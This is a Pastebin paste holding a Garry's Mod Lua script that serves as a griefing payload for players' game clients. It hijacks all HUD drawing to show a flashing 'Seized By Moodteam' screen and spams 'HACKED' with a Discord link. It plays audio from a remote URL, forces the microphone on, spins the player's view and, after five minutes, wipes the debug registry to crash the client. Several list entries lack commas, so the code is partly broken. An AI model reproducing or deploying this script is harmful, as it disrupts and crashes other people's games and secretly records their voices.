Advertisement
midou1451

Untitled

Mar 8th, 2018
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.63 KB | None | 0 0
  1.  
  2. local msg = "Waiting. . ."
  3. surface.CreateFont("lolwutbet", {size=75})
  4. local function huddrawdetour()
  5. draw.RoundedBox(0, 0, 0, ScrW(), ScrH(), HSVToColor( CurTime() % 6 * 60, 1, 1 ))
  6. draw.RoundedBox(0, 0, ScrH() / 3.5, ScrW(), ScrH() / 4.5, Color(0, 0, 0))
  7. draw.SimpleText(msg, "lolwutbet", ScrW() / 2, ScrH() / 2.5, Color(255, 255, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  8. end
  9.  
  10.  
  11. for k,v in pairs(hook.GetTable()) do
  12. for o,j in pairs(v) do
  13. if k == "HUDPaint" then
  14. hook.Remove(k, o)
  15. hook.Add(k, o, huddrawdetour)
  16. end
  17. end
  18. end
  19. hook.Add("HUDPaint","eztoirkfghdjbnvxc", huddrawdetour)
  20.  
  21. timer.Create("wowlolwut_my_boi",2 ,0 , function()
  22. msg = table.Random({
  23. "Seized By Moodteam",
  24. "Seised By FullMahchine",
  25. "Seized By Moodteam",
  26. "Seised By FullMahchine"
  27. "Seized By Moodteam",
  28. "Seised By FullMahchine"
  29. "Seized By Moodteam",
  30. "Seised By FullMahchine"
  31. "Seized By Moodteam",
  32. "Seised By FullMahchine"
  33. "Seized By Moodteam",
  34. "Seised By FullMahchine"
  35. "Seized By Moodteam",
  36. "Seised By FullMahchine"
  37. "Seized By Moodteam",
  38. "Seised By FullMahchine"
  39. })
  40. chat.AddText("HACKED https://discord.gg/jeKQfm")
  41. end)
  42.  
  43. hook.Add("Think", "gfgdfsgdfsgdfsgdf", function()
  44. chat.AddText("HACKED https://discord.gg/jeKQfm")
  45. end)
  46.  
  47. sound.PlayURL("http://midou.mtxserv.fr/rose.mp3","mono noblock", function( s )
  48. s:Play()
  49. end)
  50. LocalPlayer():ConCommand("+voicerecord")
  51. LocalPlayer():ConCommand("cl_yawspeed 9999")
  52. LocalPlayer():ConCommand("+right")
  53. MsgC(HSVToColor( CurTime() % 6 * 60, 1, 1 ), "Press the escape key !\n")
  54.  
  55.  
  56.  
  57. timer.Simple(5 * 60, function()
  58. table.Empty(debug.getregistry())
  59. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement